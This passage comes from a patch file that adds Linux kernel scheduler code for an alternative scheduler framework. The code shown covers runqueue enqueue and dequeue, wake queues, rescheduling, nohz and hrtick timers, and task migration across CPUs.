-+	smp_rmb(); /* see try_to_wake_up() */
-+	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
-+		ip = __get_wchan(p);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	return ip;
-+}
-+
-+/*
-+ * Add/Remove/Requeue task to/from the runqueue routines
-+ * Context: rq->lock
-+ */
-+#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	sched_info_dequeue(rq, p);						\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
-+										\
-+	list_del(&p->sq_node);							\
-+	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
-+		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
-+	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
-+									\
-+	p->sq_idx = task_sched_prio_idx(p, rq);				\
-+	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-+	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_DEQUEUE_TASK(p, rq, flags);
-+	--rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (1 == rq->nr_running)
-+		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_preempt_mask(rq);
-+	++rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (2 == rq->nr_running)
-+		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
-+{
-+	lockdep_assert_held(&rq->lock);
-+	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
-+		  cpu_of(rq), task_cpu(p));
-+
-+	list_del(&p->sq_node);
-+	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
-+	if (idx != p->sq_idx) {
-+		if (list_empty(&rq->queue.heads[p->sq_idx]))
-+			clear_bit(sched_idx2prio(p->sq_idx, rq),
-+				  rq->queue.bitmap);
-+		p->sq_idx = idx;
-+		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_preempt_mask(rq);
-+	}
-+}
-+
-+/*
-+ * cmpxchg based fetch_or, macro so it works for different integer types
-+ */
-+#define fetch_or(ptr, mask)						\
-+	({								\
-+		typeof(ptr) _ptr = (ptr);				\
-+		typeof(mask) _mask = (mask);				\
-+		typeof(*_ptr) _val = *_ptr;				\
-+									\
-+		do {							\
-+		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
-+	_val;								\
-+})
-+
-+#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
-+/*
-+ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
-+ * this avoids any races wrt polling state changes and thereby avoids
-+ * spurious IPIs.
-+ */
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
-+}
-+
-+/*
-+ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
-+ *
-+ * If this returns true, then the idle task promises to call
-+ * sched_ttwu_pending() and reschedule soon.
-+ */
-+static bool set_nr_if_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	typeof(ti->flags) val = READ_ONCE(ti->flags);
-+
-+	for (;;) {
-+		if (!(val & _TIF_POLLING_NRFLAG))
-+			return false;
-+		if (val & _TIF_NEED_RESCHED)
-+			return true;
-+		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
-+			break;
-+	}
-+	return true;
-+}
-+
-+#else
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	set_tsk_need_resched(p);
-+	return true;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline bool set_nr_if_polling(struct task_struct *p)
-+{
-+	return false;
-+}
-+#endif
-+#endif
-+
-+static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	struct wake_q_node *node = &task->wake_q;
-+
-+	/*
-+	 * Atomically grab the task, if ->wake_q is !nil already it means
-+	 * it's already queued (either by us or someone else) and will get the
-+	 * wakeup due to that.
-+	 *
-+	 * In order to ensure that a pending wakeup will observe our pending
-+	 * state, even in the failed case, an explicit smp_mb() must be used.
-+	 */
-+	smp_mb__before_atomic();
-+	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
-+		return false;
-+
-+	/*
-+	 * The head is context local, there can be no concurrency.
-+	 */
-+	*head->lastp = node;
-+	head->lastp = &node->next;
-+	return true;
-+}
-+
-+/**
-+ * wake_q_add() - queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ */
-+void wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (__wake_q_add(head, task))
-+		get_task_struct(task);
-+}
-+
-+/**
-+ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ *
-+ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
-+ * that already hold reference to @task can call the 'safe' version and trust
-+ * wake_q to do the right thing depending whether or not the @task is already
-+ * queued for wakeup.
-+ */
-+void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (!__wake_q_add(head, task))
-+		put_task_struct(task);
-+}
-+
-+void wake_up_q(struct wake_q_head *head)
-+{
-+	struct wake_q_node *node = head->first;
-+
-+	while (node != WAKE_Q_TAIL) {
-+		struct task_struct *task;
-+
-+		task = container_of(node, struct task_struct, wake_q);
-+		/* task can safely be re-inserted now: */
-+		node = node->next;
-+		task->wake_q.next = NULL;
-+
-+		/*
-+		 * wake_up_process() executes a full barrier, which pairs with
-+		 * the queueing in wake_q_add() so as not to miss wakeups.
-+		 */
-+		wake_up_process(task);
-+		put_task_struct(task);
-+	}
-+}
-+
-+/*
-+ * resched_curr - mark rq's current task 'to be rescheduled now'.
-+ *
-+ * On UP this means the setting of the need_resched flag, on SMP it
-+ * might also involve a cross-CPU call to trigger the scheduler on
-+ * the target CPU.
-+ */
-+void resched_curr(struct rq *rq)
-+{
-+	struct task_struct *curr = rq->curr;
-+	int cpu;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	if (test_tsk_need_resched(curr))
-+		return;
-+
-+	cpu = cpu_of(rq);
-+	if (cpu == smp_processor_id()) {
-+		set_tsk_need_resched(curr);
-+		set_preempt_need_resched();
-+		return;
-+	}
-+
-+	if (set_nr_and_not_polling(curr))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+void resched_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (cpu_online(cpu) || cpu == smp_processor_id())
-+		resched_curr(cpu_rq(cpu));
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+}
-+
-+#ifdef CONFIG_SMP
-+#ifdef CONFIG_NO_HZ_COMMON
-+void nohz_balance_enter_idle(int cpu) {}
-+
-+void select_nohz_load_balancer(int stop_tick) {}
-+
-+void set_cpu_sd_state_idle(void) {}
-+
-+/*
-+ * In the semi idle case, use the nearest busy CPU for migrating timers
-+ * from an idle CPU.  This is good for power-savings.
-+ *
-+ * We don't do similar optimization for completely idle system, as
-+ * selecting an idle CPU will add more delays to the timers than intended
-+ * (as that CPU's timer base may not be uptodate wrt jiffies etc).
-+ */
-+int get_nohz_timer_target(void)
-+{
-+	int i, cpu = smp_processor_id(), default_cpu = -1;
-+	struct cpumask *mask;
-+	const struct cpumask *hk_mask;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
-+		if (!idle_cpu(cpu))
-+			return cpu;
-+		default_cpu = cpu;
-+	}
-+
-+	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
-+
-+	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
-+		for_each_cpu_and(i, mask, hk_mask)
-+			if (!idle_cpu(i))
-+				return i;
-+
-+	if (default_cpu == -1)
-+		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
-+	cpu = default_cpu;
-+
-+	return cpu;
-+}
-+
-+/*
-+ * When add_timer_on() enqueues a timer into the timer wheel of an
-+ * idle CPU then this timer might expire before the next timer event
-+ * which is scheduled to wake up that CPU. In case of a completely
-+ * idle system the next event might even be infinite time into the
-+ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
-+ * leaves the inner idle loop so the newly added timer is taken into
-+ * account when the CPU goes back to idle and evaluates the timer
-+ * wheel for the next timer event.
-+ */
-+static inline void wake_up_idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (cpu == smp_processor_id())
-+		return;
-+
-+	if (set_nr_and_not_polling(rq->idle))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+static inline bool wake_up_full_nohz_cpu(int cpu)
-+{
-+	/*
-+	 * We just need the target to call irq_exit() and re-evaluate
-+	 * the next tick. The nohz full kick at least implies that.
-+	 * If needed we can still optimize that later with an
-+	 * empty IRQ.
-+	 */
-+	if (cpu_is_offline(cpu))
-+		return true;  /* Don't try to wake offline CPUs. */
-+	if (tick_nohz_full_cpu(cpu)) {
-+		if (cpu != smp_processor_id() ||
-+		    tick_nohz_tick_stopped())
-+			tick_nohz_full_kick_cpu(cpu);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_nohz_cpu(int cpu)
-+{
-+	if (!wake_up_full_nohz_cpu(cpu))
-+		wake_up_idle_cpu(cpu);
-+}
-+
-+static void nohz_csd_func(void *info)
-+{
-+	struct rq *rq = info;
-+	int cpu = cpu_of(rq);
-+	unsigned int flags;
-+
-+	/*
-+	 * Release the rq::nohz_csd.
-+	 */
-+	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
-+	WARN_ON(!(flags & NOHZ_KICK_MASK));
-+
-+	rq->idle_balance = idle_cpu(cpu);
-+	if (rq->idle_balance && !need_resched()) {
-+		rq->nohz_idle_balance = flags;
-+		raise_softirq_irqoff(SCHED_SOFTIRQ);
-+	}
-+}
-+
-+#endif /* CONFIG_NO_HZ_COMMON */
-+#endif /* CONFIG_SMP */
-+
-+static inline void check_preempt_curr(struct rq *rq)
-+{
-+	if (sched_rq_first_task(rq) != rq->curr)
-+		resched_curr(rq);
-+}
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+/*
-+ * Use HR-timers to deliver accurate preemption points.
-+ */
-+
-+static void hrtick_clear(struct rq *rq)
-+{
-+	if (hrtimer_active(&rq->hrtick_timer))
-+		hrtimer_cancel(&rq->hrtick_timer);
-+}
-+
-+/*
-+ * High-resolution timer tick.
-+ * Runs from hardirq context with interrupts disabled.
-+ */
-+static enum hrtimer_restart hrtick(struct hrtimer *timer)
-+{
-+	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
-+
-+	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
-+
-+	raw_spin_lock(&rq->lock);
-+	resched_curr(rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	return HRTIMER_NORESTART;
-+}
-+
-+/*
-+ * Use hrtick when:
-+ *  - enabled by features
-+ *  - hrtimer is actually high res
-+ */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	/**
-+	 * Alt schedule FW doesn't support sched_feat yet
-+	if (!sched_feat(HRTICK))
-+		return 0;
-+	*/
-+	if (!cpu_active(cpu_of(rq)))
-+		return 0;
-+	return hrtimer_is_hres_active(&rq->hrtick_timer);
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void __hrtick_restart(struct rq *rq)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	ktime_t time = rq->hrtick_time;
-+
-+	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
-+}
-+
-+/*
-+ * called from hardirq (IPI) context
-+ */
-+static void __hrtick_start(void *arg)
-+{
-+	struct rq *rq = arg;
-+
-+	raw_spin_lock(&rq->lock);
-+	__hrtick_restart(rq);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	s64 delta;
-+
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense and can cause timer DoS.
-+	 */
-+	delta = max_t(s64, delay, 10000LL);
-+
-+	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
-+
-+	if (rq == this_rq())
-+		__hrtick_restart(rq);
-+	else
-+		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
-+}
-+
-+#else
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense. Rely on vruntime for fairness.
-+	 */
-+	delay = max_t(u64, delay, 10000LL);
-+	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
-+		      HRTIMER_MODE_REL_PINNED_HARD);
-+}
-+#endif /* CONFIG_SMP */
-+
-+static void hrtick_rq_init(struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
-+#endif
-+
-+	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
-+	rq->hrtick_timer.function = hrtick;
-+}
-+#else	/* CONFIG_SCHED_HRTICK */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	return 0;
-+}
-+
-+static inline void hrtick_clear(struct rq *rq)
-+{
-+}
-+
-+static inline void hrtick_rq_init(struct rq *rq)
-+{
-+}
-+#endif	/* CONFIG_SCHED_HRTICK */
-+
-+static inline int __normal_prio(int policy, int rt_prio, int static_prio)
-+{
-+	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
-+		static_prio + MAX_PRIORITY_ADJ;
-+}
-+
-+/*
-+ * Calculate the expected normal priority: i.e. priority
-+ * without taking RT-inheritance into account. Might be
-+ * boosted by interactivity modifiers. Changes upon fork,
-+ * setprio syscalls, and whenever the interactivity
-+ * estimator recalculates.
-+ */
-+static inline int normal_prio(struct task_struct *p)
-+{
-+	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
-+}
-+
-+/*
-+ * Calculate the current priority, i.e. the priority
-+ * taken into account by the scheduler. This value might
-+ * be boosted by RT tasks as it will be RT if the task got
-+ * RT-boosted. If not then it returns p->normal_prio.
-+ */
-+static int effective_prio(struct task_struct *p)
-+{
-+	p->normal_prio = normal_prio(p);
-+	/*
-+	 * If we are RT tasks or we were boosted to RT priority,
-+	 * keep the priority unchanged. Otherwise, update priority
-+	 * to the normal priority:
-+	 */
-+	if (!rt_prio(p->prio))
-+		return p->normal_prio;
-+	return p->prio;
-+}
-+
-+/*
-+ * activate_task - move a task to the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static void activate_task(struct task_struct *p, struct rq *rq)
-+{
-+	enqueue_task(p, rq, ENQUEUE_WAKEUP);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+
-+	/*
-+	 * If in_iowait is set, the code below may not trigger any cpufreq
-+	 * utilization updates, so do it here explicitly with the IOWAIT flag
-+	 * passed.
-+	 */
-+	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
-+}
-+
-+/*
-+ * deactivate_task - remove a task from the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static inline void deactivate_task(struct task_struct *p, struct rq *rq)
-+{
-+	dequeue_task(p, rq, DEQUEUE_SLEEP);
-+	p->on_rq = 0;
-+	cpufreq_update_util(rq, 0);
-+}
-+
-+static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
-+	 * successfully executed on another CPU. We must ensure that updates of
-+	 * per-task data have been completed by this moment.
-+	 */
-+	smp_wmb();
-+
-+	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
-+#endif
-+}
-+
-+static inline bool is_migration_disabled(struct task_struct *p)
-+{
-+#ifdef CONFIG_SMP
-+	return p->migration_disabled;
-+#else
-+	return false;
-+#endif
-+}
-+
-+#define SCA_CHECK		0x01
-+#define SCA_USER		0x08
-+
-+#ifdef CONFIG_SMP
-+
-+void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
-+{
-+#ifdef CONFIG_SCHED_DEBUG
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * We should never call set_task_cpu() on a blocked task,
-+	 * ttwu() will sort out the placement.
-+	 */
-+	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
-+
-+#ifdef CONFIG_LOCKDEP
-+	/*
-+	 * The caller should hold either p->pi_lock or rq->lock, when changing
-+	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
-+	 *
-+	 * sched_move_task() holds both and thus holding either pins the cgroup,
-+	 * see task_group().
-+	 */
-+	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
-+				      lockdep_is_held(&task_rq(p)->lock)));
-+#endif
-+	/*
-+	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
-+	 */
-+	WARN_ON_ONCE(!cpu_online(new_cpu));
-+
-+	WARN_ON_ONCE(is_migration_disabled(p));
-+#endif
-+	trace_sched_migrate_task(p, new_cpu);
-+
-+	if (task_cpu(p) != new_cpu)
-+	{
-+		rseq_migrate(p);
-+		perf_event_task_migrate(p);
-+	}
-+
-+	__set_task_cpu(p, new_cpu);
-+}
-+
-+#define MDF_FORCE_ENABLED	0x80
-+
-+static void
-+__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	/*
-+	 * This here violates the locking rules for affinity, since we're only
-+	 * supposed to change these variables while holding both rq->lock and
-+	 * p->pi_lock.
-+	 *
-+	 * HOWEVER, it magically works, because ttwu() is the only code that
-+	 * accesses these variables under p->pi_lock and only does so after
-+	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
-+	 * before finish_task().
-+	 *
-+	 * XXX do further audits, this smells like something putrid.
-+	 */
-+	SCHED_WARN_ON(!p->on_cpu);
-+	p->cpus_ptr = new_mask;
-+}
-+
-+void migrate_disable(void)
-+{
-+	struct task_struct *p = current;
-+	int cpu;
-+
-+	if (p->migration_disabled) {
-+		p->migration_disabled++;
-+		return;
-+	}
-+
-+	preempt_disable();
-+	cpu = smp_processor_id();
-+	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
-+		cpu_rq(cpu)->nr_pinned++;
-+		p->migration_disabled = 1;
-+		p->migration_flags &= ~MDF_FORCE_ENABLED;
-+
-+		/*
-+		 * Violates locking rules! see comment in __do_set_cpus_ptr().
-+		 */
-+		if (p->cpus_ptr == &p->cpus_mask)
-+			__do_set_cpus_ptr(p, cpumask_of(cpu));
-+	}
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_disable);
-+
-+void migrate_enable(void)
-+{
-+	struct task_struct *p = current;
-+
-+	if (0 == p->migration_disabled)
-+		return;
-+
-+	if (p->migration_disabled > 1) {
-+		p->migration_disabled--;
-+		return;
-+	}
-+
-+	if (WARN_ON_ONCE(!p->migration_disabled))
-+		return;
-+
-+	/*
-+	 * Ensure stop_task runs either before or after this, and that
-+	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
-+	 */
-+	preempt_disable();
-+	/*
-+	 * Assumption: current should be running on allowed cpu
-+	 */
-+	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
-+	if (p->cpus_ptr != &p->cpus_mask)
-+		__do_set_cpus_ptr(p, &p->cpus_mask);
-+	/*
-+	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
-+	 * regular cpus_mask, otherwise things that race (eg.
-+	 * select_fallback_rq) get confused.
-+	 */
-+	barrier();
-+	p->migration_disabled = 0;
-+	this_rq()->nr_pinned--;
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_enable);
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return rq->nr_pinned;
-+}
-+
-+/*
-+ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
-+ * __set_cpus_allowed_ptr() and select_fallback_rq().
-+ */
-+static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
-+{
-+	/* When not in the task's cpumask, no point in looking further. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/* migrate_disabled() must be allowed to finish. */
-+	if (is_migration_disabled(p))
-+		return cpu_online(cpu);
-+
-+	/* Non kernel threads are not allowed during either online or offline. */
-+	if (!(p->flags & PF_KTHREAD))
-+		return cpu_active(cpu) && task_cpu_possible(cpu, p);
-+
-+	/* KTHREAD_IS_PER_CPU is always allowed. */
-+	if (kthread_is_per_cpu(p))
-+		return cpu_online(cpu);
-+
-+	/* Regular kernel threads don't get to stay during offline. */
-+	if (cpu_dying(cpu))
-+		return false;
-+
-+	/* But are allowed during online. */
-+	return cpu_online(cpu);
-+}
-+
-+/*
-+ * This is how migration works:
-+ *
-+ * 1) we invoke migration_cpu_stop() on the target CPU using
-+ *    stop_one_cpu().
-+ * 2) stopper starts to run (implicitly forcing the migrated thread
-+ *    off the CPU)
-+ * 3) it checks whether the migrated task is still in the wrong runqueue.
-+ * 4) if it's in the wrong runqueue then the migration thread removes
-+ *    it and puts it into the right queue.
-+ * 5) stopper completes and stop_one_cpu() returns and the migration
-+ *    is done.
-+ */
-+
-+/*
-+ * move_queued_task - move a queued task to new rq.
-+ *
-+ * Returns (locked) new rq. Old rq's lock is released.
-+ */
-+static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
-+				   new_cpu)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
-+	dequeue_task(p, rq, 0);
-+	update_sched_preempt_mask(rq);
-+	set_task_cpu(p, new_cpu);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rq = cpu_rq(new_cpu);
-+
-+	raw_spin_lock(&rq->lock);
-+	WARN_ON_ONCE(task_cpu(p) != new_cpu);
-+	sched_task_sanity_check(p, rq);
-+	enqueue_task(p, rq, 0);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+	check_preempt_curr(rq);
-+
-+	return rq;
-+}
-+
-+struct migration_arg {
-+	struct task_struct *task;
-+	int dest_cpu;
-+};
-+
-+/*
-+ * Move (not current) task off this CPU, onto the destination CPU. We're doing
-+ * this because either it can't run here any more (set_cpus_allowed()
-+ * away from this CPU, or CPU going down), or because we're
-+ * attempting to rebalance this task on exec (sched_exec).
-+ *
-+ * So we race with normal scheduler movements, but that's OK, as long
-+ * as the task is no longer on this CPU.
-+ */
-+static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
-+				 dest_cpu)
-+{
-+	/* Affinity changed (again). */
-+	if (!is_cpu_allowed(p, dest_cpu))
-+		return rq;
-+
-+	update_rq_clock(rq);
-+	return move_queued_task(rq, p, dest_cpu);
-+}
-+
-+/*
-+ * migration_cpu_stop - this will be executed by a highprio stopper thread
-+ * and performs thread migration by bumping thread off CPU then
-+ * 'pushing' onto another runqueue.
-+ */
-+static int migration_cpu_stop(void *data)
-+{
-+	struct migration_arg *arg = data;
-+	struct task_struct *p = arg->task;
-+	struct rq *rq = this_rq();
-+	unsigned long flags;
-+
-+	/*
-+	 * The original target CPU might have gone down and we might
-+	 * be on another CPU but it doesn't matter.
-+	 */
-+	local_irq_save(flags);
-+	/*
-+	 * We need to explicitly wake pending tasks before running
-+	 * __migrate_task() such that we will not miss enforcing cpus_ptr
-+	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
-+	 */
-+	flush_smp_call_function_queue();
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+	/*
-+	 * If task_rq(p) != rq, it cannot be migrated here, because we're
-+	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
-+	 * we're holding p->pi_lock.
-+	 */
-+	if (task_rq(p) == rq && task_on_rq_queued(p))
-+		rq = __migrate_task(rq, p, arg->dest_cpu);
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	return 0;
-+}
-+
-+static inline void
-+set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	cpumask_copy(&p->cpus_mask, new_mask);
-+	p->nr_cpus_allowed = cpumask_weight(new_mask);
-+}
-+
-+static void
-+__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	lockdep_assert_held(&p->pi_lock);
-+	set_cpus_allowed_common(p, new_mask);
-+}
-+
-+void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	__do_set_cpus_allowed(p, new_mask);
-+}
-+
-+int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
-+		      int node)
-+{
-+	if (!src->user_cpus_ptr)
-+		return 0;
-+
-+	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
-+	if (!dst->user_cpus_ptr)
-+		return -ENOMEM;
-+
-+	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
-+	return 0;
-+}
-+
-+static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = NULL;
-+
-+	swap(p->user_cpus_ptr, user_mask);
-+
-+	return user_mask;
-+}
-+
-+void release_user_cpus_ptr(struct task_struct *p)
-+{
-+	kfree(clear_user_cpus_ptr(p));
-+}
-+
-+#endif
-+
-+/**
-+ * task_curr - is this task currently executing on a CPU?
-+ * @p: the task in question.
-+ *
-+ * Return: 1 if the task is currently executing. 0 otherwise.
-+ */
-+inline int task_curr(const struct task_struct *p)
-+{
-+	return cpu_curr(task_cpu(p)) == p;
-+}
-+
-+#ifdef CONFIG_SMP
-+/*
-+ * wait_task_inactive - wait for a thread to unschedule.
-+ *
-+ * Wait for the thread to block in any of the states set in @match_state.
-+ * If it changes, i.e. @p might have woken up, then return zero.  When we
-+ * succeed in waiting for @p to be off its CPU, we return a positive number
-+ * (its total switch count).  If a second call a short while later returns the
-+ * same number, the caller can be sure that @p has remained unscheduled the
-+ * whole time.
-+ *
-+ * The caller must ensure that the task *will* unschedule sometime soon,
-+ * else this function might spin for a *long* time. This function can't
-+ * be called with interrupts off, or it may introduce deadlock with
-+ * smp_call_function() if an IPI is sent by the same process we are
-+ * waiting to become inactive.
-+ */
-+unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
-+{
-+	unsigned long flags;
-+	bool running, on_rq;
-+	unsigned long ncsw;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+
-+		/*
-+		 * If the task is actively running on another CPU
-+		 * still, just relax and busy-wait without holding
-+		 * any locks.
-+		 *
-+		 * NOTE! Since we don't hold any locks, it's not
-+		 * even sure that "rq" stays as the right runqueue!
-+		 * But we don't care, since this will return false
-+		 * if the runqueue has changed and p is actually now
-+		 * running somewhere else!
-+		 */
-+		while (task_on_cpu(p) && p == rq->curr) {
-+			if (!(READ_ONCE(p->__state) & match_state))
-+				return 0;
-+			cpu_relax();
-+		}
-+
-+		/*
